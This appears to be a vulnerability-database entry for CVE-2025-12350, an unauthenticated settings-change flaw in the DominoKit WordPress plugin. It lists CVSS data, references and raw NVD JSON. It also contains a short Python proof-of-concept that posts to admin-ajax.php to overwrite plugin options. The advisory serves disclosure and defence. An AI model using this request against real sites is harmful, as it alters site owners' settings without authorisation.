CVE-2025-12350

Description

The DominoKit plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wp_ajax_nopriv_dominokit_option_admin_action AJAX endpoint in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to update plugin settings.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

DominoKit plugin <= 1.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-12350 PoC - DominoKit Plugin Unauthorized Admin Action
# Target: WordPress site with DominoKit plugin <= 1.1.0

target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php"

# Malicious payload to modify plugin settings
data = {
    "action": "dominokit_option_admin_action",
    "domino_kit_action": "update_option",
    "option_name": "malicious_option",
    "option_value": "malicious_value"
}

try:
    response = requests.post(target_url, data=data, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
    if response.status_code == 200:
        print("[+] PoC executed - Unauthorized admin action may have succeeded")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12350
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12350
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12350/
[4] VulDB https://vuldb.com/cve/CVE-2025-12350
[5] https://wordpress.org/plugins/dominokit/
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/1c8de019-4ec1-49fd-9b0b-c2b1b6908ba8?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12350", "sourceIdentifier": "[email protected]", "published": "2025-11-04T05:16:11.190", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The DominoKit plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wp_ajax_nopriv_dominokit_option_admin_action AJAX endpoint in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to update plugin settings."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wordpress.org/plugins/dominokit/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1c8de019-4ec1-49fd-9b0b-c2b1b6908ba8?source=cve", "source": "[email protected]"}]}}